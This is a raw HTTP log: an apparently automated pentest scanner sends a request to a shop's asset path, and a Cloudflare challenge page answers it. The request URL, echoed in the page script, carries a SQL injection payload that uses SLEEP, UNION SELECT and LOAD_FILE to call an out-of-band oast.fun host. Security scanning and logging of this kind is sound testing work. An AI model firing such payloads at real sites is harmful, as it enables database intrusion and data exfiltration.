REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%280%29%29%29a%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--%20-/assets/component-list-payment.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10128
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847963db1a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=SspjRDsSSIDkSOUJfiDYSkYJkXJLBBuq2x1SeSIxbMmzLmPm15Zh67x0%2B%2BXP9bYnSAyDtPAeRrBIOaaSGQ3czEtxKFne1vfd2rxiEkhn%2FN%2BuWzvwhhoTDXbRwM2nl%2BDzaxzjdmKmAnGavih%2Frg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847963db1a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'EemTsqFR5gFS5se5ByzZHI2qpsl7hwin_TD8THvfjSM-1784281168-1.2.1.1-HNWoIKl9anWnObvahwT.1NwimZ573e0NDXacGctfg8pq0ETJUJw2Ud5qknFkW_9U',cITimeS: '1784281168',cRay: 'a1c847963db1a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(0)))a%20UNION%20SELECT%20LOAD_FILE(CONCAT('%5C%5C%5C%5C','h0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun','%5C%5Cb')))--%20-/assets/component-list-payment.css?__cf_chl_tk=TKDdRePKE0N8r.NYojiu2VBBwMqM7z3iDRu0PyHcYGc-1784281168-1.0.1.1-_qNaBx3oNh5RMke2AYo0Cv7Tx_5Awel7uRZTkW01ono",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(0)))a%20UNION%20SELECT%20LOAD_FILE(CONCAT('%5C%5C%5C%5C','h0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun','%5C%5Cb')))--%20-/assets/component-list-payment.css?__cf_chl_f_tk=TKDdRePKE0N8r.NYojiu2VBBwMqM7z3iDRu0PyHcYGc-1784281168-1.0.1.1-_qNaBx3oNh5RMke2AYo0Cv7Tx_5Awel7uRZTkW01ono",md: 'pex8L5ZHB0F8SiKeFCKR4MkNRWmh22kq.qT9XTNn7KY-1784281168-1.2.1.1-zwy1Dw04FOUoKwVdMyCE517VnJBxjM5w3XbLlMMkHjseHyOYXrPVBRTpzfikCFUPLr7g1gTztf4GnSmfVxn593lEPObZ_kQ3hSjtE1z0x05sAuPhl71zmpr4HPeJncDTJfGCG.qH6DyXLN_NVAxvsksSz.5rOQqjDIH27IhbDCCJpq_yiFuWuRAcEiQNUMtAL6ETgAg2Usi2Hki3LWpiFKxHCV5DZITFcXOZoAOmLq88lcW3l5IjTx323qYKp15YHfb38QDV4nmdXpK8YwKlyAeeoTMHS0uZzyKoIAH5rBq1u2L6yYrE88aIh5V2qpWPCh3h306DE9DLGa.2TuZYdlff75WVkgjfug52IKRYmjgFOxhi0EptDHr8GOxp8eYpC.BXiVWKbKtPjQMhHJ6Bly1wVnWA_F1u_iC.O8Me1owfv1cOYiflB7KF9GBJv0d_UZZA.ZPDfp7LeXOv9FR0ceq54.AsbzhZG73jX2i4ytiviWgxx25UQszbO_8pMwvhl3dlVb4JL8cqj22sfgf2D4yJEsi8GQRD4i.r90iN4_oF4QYRdgJxX4V.y1kCd2TMuxZgOBCRmDHo9oHyycqDjYooOTm8ngS.DKDT4En2jwXfk0.DeeiMPdzp5y4U55Z4Qz8dkT4w1DPkel1Y56rHBp5qqyY4QoNqKo2Bdqw9XvMfUFZfynBwsEcvyr1kYsq8dLR0FfVu8TM3y1R6ABC9miYcx8Jpj_dHsxKKqIdfcfIYnBwgZSGtvyVAKg9iUFhoojCUVYpTPwaqEm9DfM.Q0w2rT_12A3_Ji65EitI4yAtjvNIeySgVWck3Udau70AO9PTlqrMCX1SgHUbxwt6qfcPXOSnY4ysFlMBBlgYj0I7hk._ETwPg7SjAX3G3muBABH.FNpy5oa19R2HboGt5JPlCMXhLVEqsIiTnTelPDwUDmKHVhadEwFcNudCnYFpU3WlTXlOapUjL2jvjdIcPJ9XcZrXw4jONE.W6pgaPQXOpHTNSf97mx2hkKuwj.4DvnLp_Br7uOLUmqnpLXYPPrqcHo98j6CwJXDBXF_ypYt3acGiWNiiC2oaYXGUzbB241vyh4iGEewVbyY54G2zfUVx8a0mkFDC7og4buF18RngsdGXykGVIBk5bbua1CaGReWbWlRU9TVZ1ZVndcBMCz9z323M_rtYdzcTL_pQv3CDW0Okoo6Lq61GAzqZ9mgQk1vefQSR9vjEMyL5rFnWZza_DxxXako4.F6qJPz8pQ8_tZOARRd4ZEE834A29Pc5iOGYYA5OccOZehh2dW7KTtk6fcTp5GBOv5Q9dy8i7Tjxw7gSO83nsz42B3LUQs9EX3_GhaxMEmQoiQSTj1S0y0O00agEP5zfQX5TuTiMZM0zRrSllBrjXkDfpm9nwTXPoL6CAeGnXhJ8XXwoAOYcECNSVID0dOtzAcPUtUrygXmU',mdrd: '6zIKEG.eITjUQj1WSjJkm5jmlbnIyZT.Rhc6MTExGpI-1784281168-1.2.1.1-pqkpA4doGsiBuAYvJS.sV5rlOhN7fpIgsGmyAP5TCsfhnhgMmzcTPx_qepKwAM_pT8NvurZR0tU4DZ5hCdPvgh4pUBXlwOczOSPa9ND_Bz2RDERa97dP8Qi9.sjOniMskF5Eggcpyl8HoEqKVqAERZNxqz2kZdEJtn2EEWSqW3YGEjwbsvbSlSRd4QfpWyYHJ1DiXrNwPTWdFdMIqVmUi5c9qj2Ofgi_6VHJuLdMRitHe2B0GiBi46WJa15t.1_s',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847963db1a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(0)))a%20UNION%20SELECT%20LOAD_FILE(CONCAT('%5C%5C%5C%5C','h0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun','%5C%5Cb')))--%20-/assets/component-list-payment.css?__cf_chl_rt_tk=TKDdRePKE0N8r.NYojiu2VBBwMqM7z3iDRu0PyHcYGc-1784281168-1.0.1.1-_qNaBx3oNh5RMke2AYo0Cv7Tx_5Awel7uRZTkW01ono"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
